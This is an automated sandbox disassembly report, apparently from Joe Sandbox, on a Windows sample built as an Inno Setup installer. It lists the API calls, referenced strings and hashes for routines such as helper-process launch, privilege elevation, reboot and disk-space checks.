                                                    Similarity
                                                    • API ID: ByteCharMultiWide
                                                    • String ID:
                                                    • API String ID: 626452242-0
                                                    • Opcode ID: c7e5cdcebff257ae51aff8300cd1cc40ed83c093b3b6095f0ee234a78004d27f
                                                    • Instruction ID: ceed5698e636368dfd76c0cd730b865cf5009e2f8cb46b99e2292a0b329ee420
                                                    • Opcode Fuzzy Hash: c7e5cdcebff257ae51aff8300cd1cc40ed83c093b3b6095f0ee234a78004d27f
                                                    • Instruction Fuzzy Hash: 7C518170A14245AFDB20DF55D8C5BAABBF9EF29304F108077E808A73A1C778AD45CB59
                                                    APIs
                                                    • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041ED9C,?,00423887,00423C04,0041ED9C), ref: 0041F3DA
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 22959fa884de24c48d5df6d55c2b32dc96685aad46c3c62c5ebc91be37d62682
                                                    • Instruction ID: cb23d80071df23bba1d133aab7454d5b1bd3cce231e0a29d7ee5219cf2fb9859
                                                    • Opcode Fuzzy Hash: 22959fa884de24c48d5df6d55c2b32dc96685aad46c3c62c5ebc91be37d62682
                                                    • Instruction Fuzzy Hash: 08115A752407059BDB10DF19D880B86FBE5EF58350F10C53BE9A88B385D374E84ACBA9
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,00453001), ref: 00452FE3
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID:
                                                    • API String ID: 1452528299-0
                                                    • Opcode ID: f08d4b25af8aa325ab52cd9faeda57ccaa32c3ce955bb7c2d9b93568a2cf152c
                                                    • Instruction ID: 3c34fb880e90b623eb2bb31e9ea66b18baec95e7b0c87dab0e1dfc6834c7d9d6
                                                    • Opcode Fuzzy Hash: f08d4b25af8aa325ab52cd9faeda57ccaa32c3ce955bb7c2d9b93568a2cf152c
                                                    • Instruction Fuzzy Hash: 98014C356042046A8B15DF699C008AEFBE8EB4E72175046B7FC24D3382D6344E059798
                                                    APIs
                                                    • VirtualFree.KERNEL32(?,?,00004000,?,?,?,000012C4,000052C7,00401973), ref: 00401766
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: FreeVirtual
                                                    • String ID:
                                                    • API String ID: 1263568516-0
                                                    • Opcode ID: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                    • Instruction ID: fd45504e6079eb3c344fd15592bdf3984e08e9418c18d248e8b2091ea2ac4f2a
                                                    • Opcode Fuzzy Hash: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                    • Instruction Fuzzy Hash: A10120766443148FC3109F29EDC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: efb61ad58cd5fb487c50d8b3f78a63cdbb479017f0edef40a54ab24c8625a7e3
                                                    • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                    • Opcode Fuzzy Hash: efb61ad58cd5fb487c50d8b3f78a63cdbb479017f0edef40a54ab24c8625a7e3
                                                    • Instruction Fuzzy Hash:
                                                    APIs
                                                    • GetVersion.KERNEL32(?,00418FE8,00000000,?,?,?,00000001), ref: 0041F11E
                                                    • SetErrorMode.KERNEL32(00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F13A
                                                    • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F146
                                                    • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F154
                                                    • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F184
                                                    • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1AD
                                                    • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1C2
                                                    • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1D7
                                                    • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1EC
                                                    • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F201
                                                    • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F216
                                                    • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F22B
                                                    • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F240
                                                    • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F255
                                                    • FreeLibrary.KERNEL32(00000001,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F267
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                    • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                    • API String ID: 2323315520-3614243559
                                                    • Opcode ID: 555e93f06c2ea596d0c5ea37008c95f9a766e1991345355b6851531c4bbfc724
                                                    • Instruction ID: b3d5d35426b7a88a41f50cbf902c37b37573112488e24e2852513ec86d1b0e77
                                                    • Opcode Fuzzy Hash: 555e93f06c2ea596d0c5ea37008c95f9a766e1991345355b6851531c4bbfc724
                                                    • Instruction Fuzzy Hash: 1F3150B2600700ABEB01EBB9AC46A6B3794F728324751093FB508D72A2E77C5C55CF5C
                                                    APIs
                                                    • GetTickCount.KERNEL32 ref: 0045844F
                                                    • QueryPerformanceCounter.KERNEL32(02193858,00000000,004586E2,?,?,02193858,00000000,?,00458DDE,?,02193858,00000000), ref: 00458458
                                                    • GetSystemTimeAsFileTime.KERNEL32(02193858,02193858), ref: 00458462
                                                    • GetCurrentProcessId.KERNEL32(?,02193858,00000000,004586E2,?,?,02193858,00000000,?,00458DDE,?,02193858,00000000), ref: 0045846B
                                                    • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 004584E1
                                                    • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02193858,02193858), ref: 004584EF
                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B10,00000003,00000000,00000000,00000000,0045869E), ref: 00458537
                                                    • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0045868D,?,00000000,C0000000,00000000,00499B10,00000003,00000000,00000000,00000000,0045869E), ref: 00458570
                                                      • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                    • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458619
                                                    • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0045864F
                                                    • CloseHandle.KERNEL32(000000FF,00458694,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458687
                                                      • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                    • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                    • API String ID: 770386003-3271284199
                                                    • Opcode ID: 054b3fce73081814b7d88cf5b28d8f4160fb10be08dbad5a985f56231a1c746d
                                                    • Instruction ID: 5a0611516353431e4aeb24f6ab6c42495b14cb215b8b3d0382893c99e5952ef8
                                                    • Opcode Fuzzy Hash: 054b3fce73081814b7d88cf5b28d8f4160fb10be08dbad5a985f56231a1c746d
                                                    • Instruction Fuzzy Hash: E8711370A003449EDB11DF65CC41B9E7BF8EB19305F1085BAF958FB282DB7899448F69
                                                    APIs
                                                      • Part of subcall function 00477E04: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02192BD8,?,?,?,02192BD8,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E1D
                                                      • Part of subcall function 00477E04: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00477E23
                                                      • Part of subcall function 00477E04: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02192BD8,?,?,?,02192BD8,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E36
                                                      • Part of subcall function 00477E04: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02192BD8,?,?,?,02192BD8), ref: 00477E60
                                                      • Part of subcall function 00477E04: CloseHandle.KERNEL32(00000000,?,?,?,02192BD8,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E7E
                                                      • Part of subcall function 00477EDC: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00477F6E,?,?,?,02192BD8,?,00477FD0,00000000,004780E6,?,?,-00000010,?), ref: 00477F0C
                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00478020
                                                    • GetLastError.KERNEL32(00000000,004780E6,?,?,-00000010,?), ref: 00478029
                                                    • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00478076
                                                    • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 0047809A
                                                    • CloseHandle.KERNEL32(00000000,004780CB,00000000,00000000,000000FF,000000FF,00000000,004780C4,?,00000000,004780E6,?,?,-00000010,?), ref: 004780BE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                    • String ID: =G$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                    • API String ID: 883996979-2356621170
                                                    • Opcode ID: b678e359fd0ae47c3c5922cbe0b0ba0238e438d4a6a95f87c38f16ae302c5cef
                                                    • Instruction ID: f917ad2a0ddd76f9e2927b7da1bf40d86712eb5f256f3455e7a65403f61927fd
                                                    • Opcode Fuzzy Hash: b678e359fd0ae47c3c5922cbe0b0ba0238e438d4a6a95f87c38f16ae302c5cef
                                                    • Instruction Fuzzy Hash: 6A317670A40648AFDB10EFA6C845ADE76B8EB09318F91847FF518E7281DB7C4909CB59
                                                    APIs
                                                    • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 004229EC
                                                    • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BB6), ref: 004229FC
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: MessageSendShowWindow
                                                    • String ID:
                                                    • API String ID: 1631623395-0
                                                    • Opcode ID: c219f7c537efeea3579c9411d70f54cec51da60040311af4759150a5570cff70
                                                    • Instruction ID: 1945ea129714beb182378817fb96d2750a9cf3de1b1d00e1964b2da952e4e1c4
                                                    • Opcode Fuzzy Hash: c219f7c537efeea3579c9411d70f54cec51da60040311af4759150a5570cff70
                                                    • Instruction Fuzzy Hash: 54917071B04254BFDB10DFA9DA86F9E77F4AB04304F5501BAF904AB292C778AE40DB58
                                                    APIs
                                                    • IsIconic.USER32(?), ref: 0041838B
                                                    • GetWindowPlacement.USER32(?,0000002C), ref: 004183A8
                                                    • GetWindowRect.USER32(?), ref: 004183C4
                                                    • GetWindowLongA.USER32(?,000000F0), ref: 004183D2
                                                    • GetWindowLongA.USER32(?,000000F8), ref: 004183E7
                                                    • ScreenToClient.USER32(00000000), ref: 004183F0
                                                    • ScreenToClient.USER32(00000000,?), ref: 004183FB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                    • String ID: ,
                                                    • API String ID: 2266315723-3772416878
                                                    • Opcode ID: 6217f91ca86bc21168c1a31dc77beadf87db026dacfe8a4e2043101b83599555
                                                    • Instruction ID: e201a0486811adc056edcb3d82b1b2fee19cba914b7849b2462e59dde51cd5f3
                                                    • Opcode Fuzzy Hash: 6217f91ca86bc21168c1a31dc77beadf87db026dacfe8a4e2043101b83599555
                                                    • Instruction Fuzzy Hash: A3112BB1505201ABEB00DF69C885F9B77E8AF48314F15067EFD58DB296D738D900CBA9
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(00000028), ref: 004555C7
                                                    • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555CD
                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004555E6
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045560D
                                                    • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455612
                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00455623
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                    • String ID: SeShutdownPrivilege
                                                    • API String ID: 107509674-3733053543
                                                    • Opcode ID: bb799306ba89914f4ad5c57bf57863a6c2a35b94d1ae8b7cd1197278bb0a2066
                                                    • Instruction ID: a3beb9442be635481dc24a528bf80296f5a6403aa298a4e6fe1161b8e304ba10
                                                    • Opcode Fuzzy Hash: bb799306ba89914f4ad5c57bf57863a6c2a35b94d1ae8b7cd1197278bb0a2066
                                                    • Instruction Fuzzy Hash: 46F09C70294B46B5E610A6758C17F3B71889B44759F94483AFE05EE1C3EBBCD90C4A3E
                                                    APIs
                                                    • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045CFB1
                                                    • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045CFC1
                                                    • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045CFD1
                                                    • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047EFB7,00000000,0047EFE0), ref: 0045CFF6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$CryptVersion
                                                    • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                    • API String ID: 1951258720-508647305
                                                    • Opcode ID: 85d4af24599792157b57fa29dc23e54678ac232aa88ac9caf84ed8bf40255b48
                                                    • Instruction ID: aa10fef992bac70bb4986ae7772dd6d371a0f40a2d4a4027d6f3d37c18d15e1e
                                                    • Opcode Fuzzy Hash: 85d4af24599792157b57fa29dc23e54678ac232aa88ac9caf84ed8bf40255b48
                                                    • Instruction Fuzzy Hash: A1F0F9B0940700DBE728EFB6ACC67267795EBE570AF54813BA409911A2D7784499CB1C
                                                    APIs
                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,004976EE,?,?,00000000,0049B628,?,00497878,00000000,004978CC,?,?,00000000,0049B628), ref: 00497607
                                                    • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 0049768A
                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,004976C6,?,00000000,?,00000000,004976EE,?,?,00000000,0049B628,?,00497878,00000000), ref: 004976A2
                                                    • FindClose.KERNEL32(000000FF,004976CD,004976C6,?,00000000,?,00000000,004976EE,?,?,00000000,0049B628,?,00497878,00000000,004978CC), ref: 004976C0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: FileFind$AttributesCloseFirstNext
                                                    • String ID: isRS-$isRS-???.tmp
                                                    • API String ID: 134685335-3422211394
                                                    • Opcode ID: 9a85730e70ae0ef94d3f90e2644594d3b330f28a48244bbcf8e97e2e49ccae5c
                                                    • Instruction ID: ac0d863a46ff1cebd9ad17e119327f8a53363d7c8f83829e6742a95b9ddb5555
                                                    • Opcode Fuzzy Hash: 9a85730e70ae0ef94d3f90e2644594d3b330f28a48244bbcf8e97e2e49ccae5c
                                                    • Instruction Fuzzy Hash: 61317471914608ABCF10EF65CC41ADEBBBCDB45714F5184FBA908E32A1DB389E458F58
                                                    APIs
                                                    • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457431
                                                    • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457458
                                                    • SetForegroundWindow.USER32(?), ref: 00457469
                                                    • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00457741,?,00000000,0045777D), ref: 0045772C
                                                    Strings
                                                    • Cannot evaluate variable because [Code] isn't running yet, xrefs: 004575AC
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                    • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                    • API String ID: 2236967946-3182603685
                                                    • Opcode ID: cf3dd7661c3a2792e8ad76a02533a59f2a31b040d492fcb55b696cf145d9940a
                                                    • Instruction ID: ea769b4c14fff8c8931e63d970561434c834200915b3ece1ca1c477b8b524b3f
                                                    • Opcode Fuzzy Hash: cf3dd7661c3a2792e8ad76a02533a59f2a31b040d492fcb55b696cf145d9940a
                                                    • Instruction Fuzzy Hash: A591E234608204EFD715CF55E9A1F5ABBF9FB49704F2180BAE80497792C638AE05DF58
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F1F), ref: 00455E10
                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E16
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: GetDiskFreeSpaceExA$kernel32.dll
